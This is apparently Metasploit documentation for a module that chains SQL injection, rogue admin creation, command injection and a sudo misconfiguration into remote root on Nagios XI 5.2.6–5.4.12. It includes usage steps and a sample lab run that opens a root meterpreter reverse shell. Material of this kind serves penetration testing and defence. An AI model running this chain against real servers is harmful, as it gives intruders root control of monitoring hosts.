## Vulnerable Application
  Nagios XI 5.2.6 - 5.4.12 Chained Remote Root RCE

  This exploit combines many different vulnerabilities in Nagios XI to
  gain remote root access to the affected host. The process is:

  1. Reset the database user to root.
  2. Exploit SQL injection to extract api keys.
  3. Use api key to add administrative user.
  4. Authenticate to application using newly added user.
  5. Exploit command injection and sudo misconfiguration
     to get remote root shell.
  6. Remove added admin user, and reset database user.

  See [our blog post](http://blog.redactedsec.net/exploits/2018/04/26/nagios.html) for more information

## Verification Steps

  1. `use exploit/linux/http/nagios_xi_chained_rce_2_electric_boogaloo`
  2. `set rhost <IP>`
  3. `exploit`
  4. A meterpreter session should have been opened successfully

## Scenarios

### Nagios 5.2.7 on CentOS 6.7

```
msf5 > use exploit/linux/http/nagios_xi_chained_rce_2_electric_boogaloo
msf5 exploit(linux/http/nagios_xi_chained_rce_2_electric_boogaloo) > set rhost 172.22.222.182
rhost => 172.22.222.182
msf5 exploit(linux/http/nagios_xi_chained_rce_2_electric_boogaloo) > run

[*] Started reverse TCP handler on 172.22.222.177:4444
[*] Command Stager progress - 100.00% done (705/705 bytes)
[*] Sending stage (857352 bytes) to 172.22.222.182
[*] Meterpreter session 1 opened (172.22.222.177:4444 -> 172.22.222.182:35262) at 2018-06-29 11:04:03 -0500

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : localhost.localdomain
OS           : CentOS 6.9 (Linux 2.6.32-696.10.2.el6.x86_64)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter > 
```
